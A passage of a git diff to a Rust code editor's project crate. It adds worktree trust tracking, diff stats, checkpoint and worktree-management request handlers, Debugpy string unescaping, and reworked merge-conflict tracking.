authorization (auth server: {})", + discovery.auth_server_metadata.issuer, + ); + ContextServerState::AuthRequired { + server, + configuration, + discovery: Arc::new(discovery), + } + } + Err(discovery_err) => { + log::error!("{id} OAuth discovery failed: {discovery_err}"); + ContextServerState::Error { + configuration, + server, + error: format!("OAuth discovery failed: {discovery_err}").into(), + } + } + } +} diff --git a/crates/project/src/debugger/session.rs b/crates/project/src/debugger/session.rs index 2430d6c1024c61bb9af984c914df9c308c4cb64f..87e11cfd97a2f63bba3cefca671e4413deb6765f 100644 --- a/crates/project/src/debugger/session.rs +++ b/crates/project/src/debugger/session.rs @@ -2187,21 +2187,27 @@ impl Session { self.capabilities.supports_restart_request.unwrap_or(false) && !self.is_terminated(); self.restart_task = Some(cx.spawn(async move |this, cx| { - let _ = this.update(cx, |session, cx| { + this.update(cx, |session, cx| { if supports_dap_restart { - session - .request( - RestartCommand { - raw: args.unwrap_or(Value::Null), - }, - Self::fallback_to_manual_restart, - cx, - ) - .detach(); + session.request( + RestartCommand { + raw: args.unwrap_or(Value::Null), + }, + Self::fallback_to_manual_restart, + cx, + ) } else { cx.emit(SessionStateEvent::Restart); + Task::ready(None) } - }); + }) + .unwrap_or_else(|_| Task::ready(None)) + .await; + + this.update(cx, |session, _cx| { + session.restart_task = None; + }) + .ok(); })); } @@ -2645,10 +2651,40 @@ impl Session { self.fetch( command, move |this, variables, cx| { - let Some(variables) = variables.log_err() else { + let Some(mut variables) = variables.log_err() else { return; }; + if this.adapter.0.as_ref() == "Debugpy" { + for variable in variables.iter_mut() { + if variable.type_ == Some("str".into()) { + // reverse Python repr() escaping + let mut unescaped = String::with_capacity(variable.value.len()); + let mut chars = variable.value.chars(); + while let Some(c) = chars.next() { + if c != '\\' { + unescaped.push(c); + } else { + match chars.next() { + Some('\\') => unescaped.push('\\'), + Some('n') => unescaped.push('\n'), + Some('t') => unescaped.push('\t'), + Some('r') => unescaped.push('\r'), + Some('\'') => unescaped.push('\''), + Some('"') => unescaped.push('"'), + Some(c) => { + unescaped.push('\\'); + unescaped.push(c); + } + None => {} + } + } + } + variable.value = unescaped; + } + } + } + this.active_snapshot .variables .insert(variables_reference, variables); diff --git a/crates/project/src/debugger/test.rs b/crates/project/src/debugger/test.rs index 53b88323e6326fe7d6d74f79a5e92845514c6b61..7ccbafa0e5507e3b7362a31df5170e285d7532f0 100644 --- a/crates/project/src/debugger/test.rs +++ b/crates/project/src/debugger/test.rs @@ -1,3 +1,4 @@ +#![expect(clippy::result_large_err)] use std::{path::Path, sync::Arc}; use dap::client::DebugAdapterClient; diff --git a/crates/project/src/environment.rs b/crates/project/src/environment.rs index 6a7f0311d04f14941b21ee9e32bda0faec2783b5..8156e172b91796ec3a9ef9446188a14bd537887e 100644 --- a/crates/project/src/environment.rs +++ b/crates/project/src/environment.rs @@ -194,6 +194,27 @@ impl ProjectEnvironment { .unwrap_or_else(|| Task::ready(None).shared()) } + /// Returns the project environment using the default worktree path. + /// This ensures that project-specific environment variables (e.g. from `.envrc`) + /// are loaded from the project directory rather than the home directory. + pub fn default_environment( + &mut self, + cx: &mut App, + ) -> Shared>>> { + let abs_path = self + .worktree_store + .read_with(cx, |worktree_store, cx| { + crate::Project::default_visible_worktree_paths(worktree_store, cx) + .into_iter() + .next() + }) + .ok() + .flatten() + .map(|path| Arc::::from(path)) + .unwrap_or_else(|| paths::home_dir().as_path().into()); + self.local_directory_environment(&Shell::System, abs_path, cx) + } + /// Returns the project environment, if possible. /// If the project was opened from the CLI, then the inherited CLI environment is returned. /// If it wasn't opened from the CLI, and an absolute path is given, then a shell is spawned in diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 3113163cbaec65d7b439e0cbf46603d60ac3fae0..e7e84ffe673881d898a56b64892887b9c8d6c809 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -6,6 +6,9 @@ pub mod pending_op; use crate::{ ProjectEnvironment, ProjectItem, ProjectPath, buffer_store::{BufferStore, BufferStoreEvent}, + trusted_worktrees::{ + PathTrust, TrustedWorktrees, TrustedWorktreesEvent, TrustedWorktreesStore, + }, worktree_store::{WorktreeStore, WorktreeStoreEvent}, }; use anyhow::{Context as _, Result, anyhow, bail}; @@ -21,7 +24,7 @@ use futures::{ mpsc, oneshot::{self, Canceled}, }, - future::{self, Shared}, + future::{self, BoxFuture, Shared}, stream::FuturesOrdered, }; use git::{ @@ -31,13 +34,13 @@ use git::{ repository::{ Branch, CommitDetails, CommitDiff, CommitFile, CommitOptions, DiffType, FetchOptions, GitRepository, GitRepositoryCheckpoint, GraphCommitData, InitialGraphCommitData, LogOrder, - LogSource, PushOptions, Remote, RemoteCommandOutput, RepoPath, ResetMode, + LogSource, PushOptions, Remote, RemoteCommandOutput, RepoPath, ResetMode, SearchCommitArgs, UpstreamTrackingStatus, Worktree as GitWorktree, }, stash::{GitStash, StashEntry}, status::{ - DiffTreeType, FileStatus, GitSummary, StatusCode, TrackedStatus, TreeDiff, TreeDiffStatus, - UnmergedStatus, UnmergedStatusCode, + self, DiffStat, DiffTreeType, FileStatus, GitSummary, StatusCode, TrackedStatus, TreeDiff, + TreeDiffStatus, UnmergedStatus, UnmergedStatusCode, }, }; use gpui::{ @@ -72,7 +75,7 @@ use std::{ }, time::Instant, }; -use sum_tree::{Edit, SumTree, TreeSet}; +use sum_tree::{Edit, SumTree, TreeMap}; use task::Shell; use text::{Bias, BufferId}; use util::{ @@ -192,6 +195,7 @@ pub struct GitStoreCheckpoint { pub struct StatusEntry { pub repo_path: RepoPath, pub status: FileStatus, + pub diff_stat: Option, } impl StatusEntry { @@ -213,6 +217,8 @@ impl StatusEntry { repo_path: self.repo_path.to_proto(), simple_status, status: Some(status_to_proto(self.status)), + diff_stat_added: self.diff_stat.map(|ds| ds.added), + diff_stat_deleted: self.diff_stat.map(|ds| ds.deleted), } } } @@ -223,7 +229,15 @@ impl TryFrom for StatusEntry { fn try_from(value: proto::StatusEntry) -> Result { let repo_path = RepoPath::from_proto(&value.repo_path).context("invalid repo path")?; let status = status_from_proto(value.simple_status, value.status)?; - Ok(Self { repo_path, status }) + let diff_stat = match (value.diff_stat_added, value.diff_stat_deleted) { + (Some(added), Some(deleted)) => Some(DiffStat { added, deleted }), + _ => None, + }; + Ok(Self { + repo_path, + status, + diff_stat, + }) } } @@ -251,9 +265,8 @@ pub struct RepositoryId(pub u64); #[derive(Clone, Debug, Default, PartialEq, Eq)] pub struct MergeDetails { - pub conflicted_paths: TreeSet, + pub merge_heads_by_conflicted_path: TreeMap>>, pub message: Option, - pub heads: Vec>, } #[derive(Clone)] @@ -267,14 +280,21 @@ pub struct RepositorySnapshot { pub id: RepositoryId, pub statuses_by_path: SumTree, pub work_directory_abs_path: Arc, + /// The working directory of the original repository. For a normal + /// checkout this equals `work_directory_abs_path`. For a git worktree + /// checkout, this is the original repo's working directory — used to + /// anchor new worktree creation so they don't nest. + pub original_repo_abs_path: Arc, pub path_style: PathStyle, pub branch: Option, + pub branch_list: Arc<[Branch]>, pub head_commit: Option, pub scan_id: u64, pub merge: MergeDetails, pub remote_origin_url: Option, pub remote_upstream_url: Option, pub stash_entries: GitStash, + pub linked_worktrees: Arc<[GitWorktree]>, } type JobId = u64; @@ -309,6 +329,12 @@ pub struct GraphDataResponse<'a> { pub error: Option, } +#[derive(Clone, Debug)] +enum CreateWorktreeStartPoint { + Detached, + Branched { name: String }, +} + pub struct Repository { this: WeakEntity, snapshot: RepositorySnapshot, @@ -350,6 +376,7 @@ impl LocalRepositoryState { dot_git_abs_path: Arc, project_environment: WeakEntity, fs: Arc, + is_trusted: bool, cx: &mut AsyncApp, ) -> anyhow::Result { let environment = project_environment @@ -377,6 +404,7 @@ impl LocalRepositoryState { } }) .await?; + backend.set_trusted(is_trusted); Ok(LocalRepositoryState { backend, environment: Arc::new(environment), @@ -407,9 +435,10 @@ pub enum GitGraphEvent { #[derive(Clone, Debug, PartialEq, Eq)] pub enum RepositoryEvent { StatusesChanged, - MergeHeadsChanged, - BranchChanged, + HeadChanged, + BranchListChanged, StashEntriesChanged, + GitWorktreeListChanged, PendingOpsChanged { pending_ops: SumTree }, GraphEvent((LogSource, LogOrder), GitGraphEvent), } @@ -492,11 +521,15 @@ impl GitStore { state: GitStoreState, cx: &mut Context, ) -> Self { - let _subscriptions = vec![ + let mut _subscriptions = vec![ cx.subscribe(&worktree_store, Self::on_worktree_store_event), cx.subscribe(&buffer_store, Self::on_buffer_store_event), ]; + if let Some(trusted_worktrees) = TrustedWorktrees::try_get_global(cx) { + _subscriptions.push(cx.subscribe(&trusted_worktrees, Self::on_trusted_worktrees_event)); + } + GitStore { state, buffer_store, @@ -535,6 +568,10 @@ impl GitStore { client.add_entity_request_handler(Self::handle_run_hook); client.add_entity_request_handler(Self::handle_reset); client.add_entity_request_handler(Self::handle_show); + client.add_entity_request_handler(Self::handle_create_checkpoint); + client.add_entity_request_handler(Self::handle_restore_checkpoint); + client.add_entity_request_handler(Self::handle_compare_checkpoints); + client.add_entity_request_handler(Self::handle_diff_checkpoints); client.add_entity_request_handler(Self::handle_load_commit_diff); client.add_entity_request_handler(Self::handle_file_history); client.add_entity_request_handler(Self::handle_checkout_files); @@ -543,7 +580,6 @@ impl GitStore { client.add_entity_request_handler(Self::handle_askpass); client.add_entity_request_handler(Self::handle_check_for_pushed_commits); client.add_entity_request_handler(Self::handle_git_diff); - client.add_entity_request_handler(Self::handle_git_diff_stat); client.add_entity_request_handler(Self::handle_tree_diff); client.add_entity_request_handler(Self::handle_get_blob_content); client.add_entity_request_handler(Self::handle_open_unstaged_diff); @@ -556,6 +592,9 @@ impl GitStore { client.add_entity_request_handler(Self::handle_git_clone); client.add_entity_request_handler(Self::handle_get_worktrees); client.add_entity_request_handler(Self::handle_create_worktree); + client.add_entity_request_handler(Self::handle_remove_worktree); + client.add_entity_request_handler(Self::handle_rename_worktree); + client.add_entity_request_handler(Self::handle_get_head_sha); } pub fn is_local(&self) -> bool { @@ -1506,20 +1545,35 @@ impl GitStore { } else if let UpdatedGitRepository { new_work_directory_abs_path: Some(work_directory_abs_path), dot_git_abs_path: Some(dot_git_abs_path), - repository_dir_abs_path: Some(_repository_dir_abs_path), - common_dir_abs_path: Some(_common_dir_abs_path), + repository_dir_abs_path: Some(repository_dir_abs_path), + common_dir_abs_path: Some(common_dir_abs_path), .. } = update { + let original_repo_abs_path: Arc = git::repository::original_repo_path( + work_directory_abs_path, + common_dir_abs_path, + repository_dir_abs_path, + ) + .into(); let id = RepositoryId(next_repository_id.fetch_add(1, atomic::Ordering::Release)); + let is_trusted = TrustedWorktrees::try_get_global(cx) + .map(|trusted_worktrees| { + trusted_worktrees.update(cx, |trusted_worktrees, cx| { + trusted_worktrees.can_trust(&self.worktree_store, worktree_id, cx) + }) + }) + .unwrap_or(false); let git_store = cx.weak_entity(); let repo = cx.new(|cx| { let mut repo = Repository::local( id, work_directory_abs_path.clone(), + original_repo_abs_path.clone(), dot_git_abs_path.clone(), project_environment.downgrade(), fs.clone(), + is_trusted, git_store, cx, ); @@ -1560,6 +1614,39 @@ impl GitStore { } } + fn on_trusted_worktrees_event( + &mut self, + _: Entity, + event: &TrustedWorktreesEvent, + cx: &mut Context, + ) { + if !matches!(self.state, GitStoreState::Local { .. }) { + return; + } + + let (is_trusted, event_paths) = match event { + TrustedWorktreesEvent::Trusted(_, trusted_paths) => (true, trusted_paths), + TrustedWorktreesEvent::Restricted(_, restricted_paths) => (false, restricted_paths), + }; + + for (repo_id, worktree_ids) in &self.worktree_ids { + if worktree_ids + .iter() + .any(|worktree_id| event_paths.contains(&PathTrust::Worktree(*worktree_id))) + { + if let Some(repo) = self.repositories.get(repo_id) { + let repository_state = repo.read(cx).repository_state.clone(); + cx.background_spawn(async move { + if let Ok(RepositoryState::Local(state)) = repository_state.await { + state.backend.set_trusted(is_trusted); + } + }) + .detach(); + } + } + } + } + fn on_buffer_store_event( &mut self, _: Entity, @@ -1725,6 +1812,26 @@ impl GitStore { &self.repositories } + /// Returns the original (main) repository working directory for the given worktree. + /// For normal checkouts this equals the worktree's own path; for linked + /// worktrees it points back to the original repo. + pub fn original_repo_path_for_worktree( + &self, + worktree_id: WorktreeId, + cx: &App, + ) -> Option> { + self.active_repo_id + .iter() + .chain(self.worktree_ids.keys()) + .find(|repo_id| { + self.worktree_ids + .get(repo_id) + .is_some_and(|ids| ids.contains(&worktree_id)) + }) + .and_then(|repo_id| self.repositories.get(repo_id)) + .map(|repo| repo.read(cx).snapshot().original_repo_abs_path) + } + pub fn status_for_buffer_id(&self, buffer_id: BufferId, cx: &App) -> Option { let (repo, path) = self.repository_and_path_for_buffer_id(buffer_id, cx)?; let status = repo.read(cx).snapshot.status_for_path(&path)?; @@ -1842,6 +1949,11 @@ impl GitStore { let id = RepositoryId::from_proto(update.id); let client = this.upstream_client().context("no upstream client")?; + let original_repo_abs_path: Option> = update + .original_repo_abs_path + .as_deref() + .map(|p| Path::new(p).into()); + let mut repo_subscription = None; let repo = this.repositories.entry(id).or_insert_with(|| { let git_store = cx.weak_entity(); @@ -1849,6 +1961,7 @@ impl GitStore { Repository::remote( id, Path::new(&update.abs_path).into(), + original_repo_abs_path.clone(), path_style, ProjectId(update.project_id), client, @@ -2234,6 +2347,7 @@ impl GitStore { CommitOptions { amend: options.amend, signoff: options.signoff, + allow_empty: options.allow_empty, }, askpass, cx, @@ -2300,18 +2414,77 @@ impl GitStore { let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; let directory = PathBuf::from(envelope.payload.directory); - let name = envelope.payload.name; + let start_point = if envelope.payload.name.is_empty() { + CreateWorktreeStartPoint::Detached + } else { + CreateWorktreeStartPoint::Branched { + name: envelope.payload.name, + } + }; let commit = envelope.payload.commit; repository_handle .update(&mut cx, |repository_handle, _| { - repository_handle.create_worktree(name, directory, commit) + repository_handle.create_worktree_with_start_point(start_point, directory, commit) + }) + .await??; + + Ok(proto::Ack {}) + } + + async fn handle_remove_worktree( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + let path = PathBuf::from(envelope.payload.path); + let force = envelope.payload.force; + + repository_handle + .update(&mut cx, |repository_handle, _| { + repository_handle.remove_worktree(path, force) + }) + .await??; + + Ok(proto::Ack {}) + } + + async fn handle_rename_worktree( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + let old_path = PathBuf::from(envelope.payload.old_path); + let new_path = PathBuf::from(envelope.payload.new_path); + + repository_handle + .update(&mut cx, |repository_handle, _| { + repository_handle.rename_worktree(old_path, new_path) }) .await??; Ok(proto::Ack {}) } + async fn handle_get_head_sha( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let head_sha = repository_handle + .update(&mut cx, |repository_handle, _| repository_handle.head_sha()) + .await??; + + Ok(proto::GitGetHeadShaResponse { sha: head_sha }) + } + async fn handle_get_branches( this: Entity, envelope: TypedEnvelope, @@ -2429,11 +2602,12 @@ impl GitStore { ) -> Result { let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + let is_remote = envelope.payload.is_remote; let branch_name = envelope.payload.branch_name; repository_handle .update(&mut cx, |repository_handle, _| { - repository_handle.delete_branch(branch_name) + repository_handle.delete_branch(is_remote, branch_name) }) .await??; @@ -2480,6 +2654,92 @@ impl GitStore { }) } + async fn handle_create_checkpoint( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let checkpoint = repository_handle + .update(&mut cx, |repository, _| repository.checkpoint()) + .await??; + + Ok(proto::GitCreateCheckpointResponse { + commit_sha: checkpoint.commit_sha.as_bytes().to_vec(), + }) + } + + async fn handle_restore_checkpoint( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let checkpoint = GitRepositoryCheckpoint { + commit_sha: Oid::from_bytes(&envelope.payload.commit_sha)?, + }; + + repository_handle + .update(&mut cx, |repository, _| { + repository.restore_checkpoint(checkpoint) + }) + .await??; + + Ok(proto::Ack {}) + } + + async fn handle_compare_checkpoints( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let left = GitRepositoryCheckpoint { + commit_sha: Oid::from_bytes(&envelope.payload.left_commit_sha)?, + }; + let right = GitRepositoryCheckpoint { + commit_sha: Oid::from_bytes(&envelope.payload.right_commit_sha)?, + }; + + let equal = repository_handle + .update(&mut cx, |repository, _| { + repository.compare_checkpoints(left, right) + }) + .await??; + + Ok(proto::GitCompareCheckpointsResponse { equal }) + } + + async fn handle_diff_checkpoints( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let base = GitRepositoryCheckpoint { + commit_sha: Oid::from_bytes(&envelope.payload.base_commit_sha)?, + }; + let target = GitRepositoryCheckpoint { + commit_sha: Oid::from_bytes(&envelope.payload.target_commit_sha)?, + }; + + let diff = repository_handle + .update(&mut cx, |repository, _| { + repository.diff_checkpoints(base, target) + }) + .await??; + + Ok(proto::GitDiffCheckpointsResponse { diff }) + } + async fn handle_load_commit_diff( this: Entity, envelope: TypedEnvelope, @@ -2699,45 +2959,6 @@ impl GitStore { Ok(proto::GitDiffResponse { diff }) } - async fn handle_git_diff_stat( - this: Entity, - envelope: TypedEnvelope, - mut cx: AsyncApp, - ) -> Result { - let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); - let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; - let diff_type = match envelope.payload.diff_type() { - proto::git_diff_stat::DiffType::HeadToIndex => DiffType::HeadToIndex, - proto::git_diff_stat::DiffType::HeadToWorktree => DiffType::HeadToWorktree, - proto::git_diff_stat::DiffType::MergeBase => { - let base_ref = envelope - .payload - .merge_base_ref - .ok_or_else(|| anyhow!("merge_base_ref is required for MergeBase diff type"))?; - DiffType::MergeBase { - base_ref: base_ref.into(), - } - } - }; - - let stats = repository_handle - .update(&mut cx, |repository_handle, cx| { - repository_handle.diff_stat(diff_type, cx) - }) - .await??; - - let entries = stats - .into_iter() - .map(|(path, stat)| proto::GitDiffStatEntry { - path: path.to_proto(), - added: stat.added, - deleted: stat.deleted, - }) - .collect(); - - Ok(proto::GitDiffStatResponse { entries }) - } - async fn handle_tree_diff( this: Entity, request: TypedEnvelope, @@ -3483,18 +3704,27 @@ impl RepositoryId { } impl RepositorySnapshot { - fn empty(id: RepositoryId, work_directory_abs_path: Arc, path_style: PathStyle) -> Self { + fn empty( + id: RepositoryId, + work_directory_abs_path: Arc, + original_repo_abs_path: Option>, + path_style: PathStyle, + ) -> Self { Self { id, statuses_by_path: Default::default(), + original_repo_abs_path: original_repo_abs_path + .unwrap_or_else(|| work_directory_abs_path.clone()), work_directory_abs_path, branch: None, + branch_list: Arc::from([]), head_commit: None, scan_id: 0, merge: Default::default(), remote_origin_url: None, remote_upstream_url: None, stash_entries: Default::default(), + linked_worktrees: Arc::from([]), path_style, } } @@ -3511,9 +3741,9 @@ impl RepositorySnapshot { removed_statuses: Default::default(), current_merge_conflicts: self .merge - .conflicted_paths + .merge_heads_by_conflicted_path .iter() - .map(|repo_path| repo_path.to_proto()) + .map(|(repo_path, _)| repo_path.to_proto()) .collect(), merge_message: self.merge.message.as_ref().map(|msg| msg.to_string()), project_id, @@ -3530,6 +3760,14 @@ impl RepositorySnapshot { .collect(), remote_upstream_url: self.remote_upstream_url.clone(), remote_origin_url: self.remote_origin_url.clone(), + original_repo_abs_path: Some( + self.original_repo_abs_path.to_string_lossy().into_owned(), + ), + linked_worktrees: self + .linked_worktrees + .iter() + .map(worktree_to_proto) + .collect(), } } @@ -3551,7 +3789,9 @@ impl RepositorySnapshot { current_new_entry = new_statuses.next(); } Ordering::Equal => { - if new_entry.status != old_entry.status { + if new_entry.status != old_entry.status + || new_entry.diff_stat != old_entry.diff_stat + { updated_statuses.push(new_entry.to_proto()); } current_old_entry = old_statuses.next(); @@ -3582,9 +3822,9 @@ impl RepositorySnapshot { removed_statuses, current_merge_conflicts: self .merge - .conflicted_paths + .merge_heads_by_conflicted_path .iter() - .map(|path| path.to_proto()) + .map(|(path, _)| path.to_proto()) .collect(), merge_message: self.merge.message.as_ref().map(|msg| msg.to_string()), project_id, @@ -3601,9 +3841,40 @@ impl RepositorySnapshot { .collect(), remote_upstream_url: self.remote_upstream_url.clone(), remote_origin_url: self.remote_origin_url.clone(), + original_repo_abs_path: Some( + self.original_repo_abs_path.to_string_lossy().into_owned(), + ), + linked_worktrees: self + .linked_worktrees + .iter() + .map(worktree_to_proto) + .collect(), } } + /// The main worktree is the original checkout that other worktrees were + /// created from. + /// + /// For example, if you had both `~/code/zed` and `~/code/worktrees/zed-2`, + /// then `~/code/zed` is the main worktree and `~/code/worktrees/zed-2` is a linked worktree. + /// + /// Submodules also return `true` here, since they are not linked worktrees. + pub fn is_main_worktree(&self) -> bool { + self.work_directory_abs_path == self.original_repo_abs_path + } + + /// Returns true if this repository is a linked worktree, that is, one that + /// was created from another worktree. + /// + /// Returns `false` for both the main worktree and submodules. + pub fn is_linked_worktree(&self) -> bool { + !self.is_main_worktree() + } + + pub fn linked_worktrees(&self) -> &[GitWorktree] { + &self.linked_worktrees + } + pub fn status(&self) -> impl Iterator + '_ { self.statuses_by_path.iter().cloned() } @@ -3618,6 +3889,12 @@ impl RepositorySnapshot { .cloned() } + pub fn diff_stat_for_path(&self, path: &RepoPath) -> Option { + self.statuses_by_path + .get(&PathKey(path.as_ref().clone()), ()) + .and_then(|entry| entry.diff_stat) + } + pub fn abs_path_to_repo_path(&self, abs_path: &Path) -> Option { Self::abs_path_to_repo_path_inner(&self.work_directory_abs_path, abs_path, self.path_style) } @@ -3640,12 +3917,16 @@ impl RepositorySnapshot { } pub fn had_conflict_on_last_merge_head_change(&self, repo_path: &RepoPath) -> bool { - self.merge.conflicted_paths.contains(repo_path) + self.merge + .merge_heads_by_conflicted_path + .contains_key(repo_path) } pub fn has_conflict(&self, repo_path: &RepoPath) -> bool { - let had_conflict_on_last_merge_head_change = - self.merge.conflicted_paths.contains(repo_path); + let had_conflict_on_last_merge_head_change = self + .merge + .merge_heads_by_conflicted_path + .contains_key(repo_path); let has_conflict_currently = self .status_for_path(repo_path) .is_some_and(|entry| entry.status.is_conflicted()); @@ -3684,13 +3965,13 @@ pub fn proto_to_stash(entry: &proto::StashEntry) -> Result { } impl MergeDetails { - async fn load( + async fn update( + &mut self, backend: &Arc, - status: &SumTree, - prev_snapshot: &RepositorySnapshot, - ) -> Result<(MergeDetails, bool)> { + current_conflicted_paths: Vec, + ) -> Result { log::debug!("load merge details"); - let message = backend.merge_message().await; + self.message = backend.merge_message().await.map(SharedString::from); let heads = backend .revparse_batch(vec![ "MERGE_HEAD".into(), @@ -3705,48 +3986,42 @@ impl MergeDetails { .into_iter() .map(|opt| opt.map(SharedString::from)) .collect::>(); - let merge_heads_changed = heads != prev_snapshot.merge.heads; - let conflicted_paths = if merge_heads_changed { - let current_conflicted_paths = TreeSet::from_ordered_entries( - status - .iter() - .filter(|entry| entry.status.is_conflicted()) - .map(|entry| entry.repo_path.clone()), - ); - // It can happen that we run a scan while a lengthy merge is in progress - // that will eventually result in conflicts, but before those conflicts - // are reported by `git status`. Since for the moment we only care about - // the merge heads state for the purposes of tracking conflicts, don't update - // this state until we see some conflicts. - if heads.iter().any(Option::is_some) - && !prev_snapshot.merge.heads.iter().any(Option::is_some) - && current_conflicted_paths.is_empty() - { - log::debug!("not updating merge heads because no conflicts found"); - return Ok(( - MergeDetails { - message: message.map(SharedString::from), - ..prev_snapshot.merge.clone() - }, - false, - )); + let mut conflicts_changed = false; + + // Record the merge state for newly conflicted paths + for path in ¤t_conflicted_paths { + if self.merge_heads_by_conflicted_path.get(&path).is_none() { + conflicts_changed = true; + self.merge_heads_by_conflicted_path + .insert(path.clone(), heads.clone()); } + } - current_conflicted_paths - } else { - prev_snapshot.merge.conflicted_paths.clone() - }; - let details = MergeDetails { - conflicted_paths, - message: message.map(SharedString::from), - heads, - }; - Ok((details, merge_heads_changed)) + // Clear state for paths that are no longer conflicted and for which the merge heads have changed + self.merge_heads_by_conflicted_path + .retain(|path, old_merge_heads| { + let keep = current_conflicted_paths.contains(path) + || (old_merge_heads == &heads + && old_merge_heads.iter().any(|head| head.is_some())); + if !keep { + conflicts_changed = true; + } + keep + }); + + Ok(conflicts_changed) } } impl Repository { + pub fn is_trusted(&self) -> bool { + match self.repository_state.peek() { + Some(Ok(RepositoryState::Local(state))) => state.backend.is_trusted(), + _ => false, + } + } + pub fn snapshot(&self) -> RepositorySnapshot { self.snapshot.clone() } @@ -3768,14 +4043,20 @@ impl Repository { fn local( id: RepositoryId, work_directory_abs_path: Arc, + original_repo_abs_path: Arc, dot_git_abs_path: Arc, project_environment: WeakEntity, fs: Arc, + is_trusted: bool, git_store: WeakEntity, cx: &mut Context, ) -> Self { - let snapshot = - RepositorySnapshot::empty(id, work_directory_abs_path.clone(), PathStyle::local()); + let snapshot = RepositorySnapshot::empty( + id, + work_directory_abs_path.clone(), + Some(original_repo_abs_path), + PathStyle::local(), + ); let state = cx .spawn(async move |_, cx| { LocalRepositoryState::new( @@ -3783,6 +4064,7 @@ impl Repository { dot_git_abs_path, project_environment, fs, + is_trusted, cx, ) .await @@ -3798,11 +4080,17 @@ impl Repository { .shared(); cx.subscribe_self(move |this, event: &RepositoryEvent, _| match event { - RepositoryEvent::BranchChanged | RepositoryEvent::MergeHeadsChanged => { + RepositoryEvent::HeadChanged | RepositoryEvent::BranchListChanged => { if this.scan_id > 1 { this.initial_graph_data.clear(); } } + RepositoryEvent::StashEntriesChanged => { + if this.scan_id > 1 { + this.initial_graph_data + .retain(|(log_source, _), _| *log_source != LogSource::All); + } + } _ => {} }) .detach(); @@ -3829,13 +4117,19 @@ impl Repository { fn remote( id: RepositoryId, work_directory_abs_path: Arc, + original_repo_abs_path: Option>, path_style: PathStyle, project_id: ProjectId, client: AnyProtoClient, git_store: WeakEntity, cx: &mut Context, ) -> Self { - let snapshot = RepositorySnapshot::empty(id, work_directory_abs_path, path_style); + let snapshot = RepositorySnapshot::empty( + id, + work_directory_abs_path, + original_repo_abs_path, + path_style, + ); let repository_state = RemoteRepositoryState { project_id, client }; let job_sender = Self::spawn_remote_git_worker(repository_state.clone(), cx); let repository_state = Task::ready(Ok(RepositoryState::Remote(repository_state))).shared(); @@ -4107,6 +4401,10 @@ impl Repository { self.snapshot.status() } + pub fn diff_stat_for_path(&self, path: &RepoPath) -> Option { + self.snapshot.diff_stat_for_path(path) + } + pub fn cached_stash(&self) -> GitStash { self.snapshot.stash_entries.clone() } @@ -4426,6 +4724,32 @@ impl Repository { self.initial_graph_data.get(&(log_source, log_order)) } + pub fn search_commits( + &mut self, + log_source: LogSource, + search_args: SearchCommitArgs, + request_tx: smol::channel::Sender, + cx: &mut Context, + ) { + let repository_state = self.repository_state.clone(); + + cx.background_spawn(async move { + let repo_state = repository_state.await; + + match repo_state { + Ok(RepositoryState::Local(LocalRepositoryState { backend, .. })) => { + backend + .search_commits(log_source, search_args, request_tx) + .await + .log_err(); + } + Ok(RepositoryState::Remote(_)) => {} + Err(_) => {} + }; + }) + .detach(); + } + pub fn graph_data( &mut self, log_source: LogSource, @@ -4529,12 +4853,11 @@ impl Repository { .commit_oid_to_index .insert(commit_data.sha, graph_data.commit_data.len()); graph_data.commit_data.push(commit_data); - - cx.emit(RepositoryEvent::GraphEvent( - graph_data_key.clone(), - GitGraphEvent::CountUpdated(graph_data.commit_data.len()), - )); } + cx.emit(RepositoryEvent::GraphEvent( + graph_data_key.clone(), + GitGraphEvent::CountUpdated(graph_data.commit_data.len()), + )); }); match &graph_data { @@ -4896,47 +5219,73 @@ impl Repository { } pub fn stage_all(&mut self, cx: &mut Context) -> Task> { - let to_stage = self - .cached_status() - .filter_map(|entry| { - if let Some(ops) = self.pending_ops_for_path(&entry.repo_path) { - if ops.staging() || ops.staged() { + let snapshot = self.snapshot.clone(); + let pending_ops = self.pending_ops.clone(); + let to_stage = cx.background_spawn(async move { + snapshot + .status() + .filter_map(|entry| { + if let Some(ops) = + pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ()) + { + if ops.staging() || ops.staged() { + None + } else { + Some(entry.repo_path) + } + } else if entry.status.staging().is_fully_staged() { None } else { Some(entry.repo_path) } - } else if entry.status.staging().is_fully_staged() { - None - } else { - Some(entry.repo_path) - } - }) - .collect(); - self.stage_or_unstage_entries(true, to_stage, cx) + }) + .collect() + }); + + cx.spawn(async move |this, cx| { + let to_stage = to_stage.await; + this.update(cx, |this, cx| { + this.stage_or_unstage_entries(true, to_stage, cx) + })? + .await + }) } pub fn unstage_all(&mut self, cx: &mut Context) -> Task> { - let to_unstage = 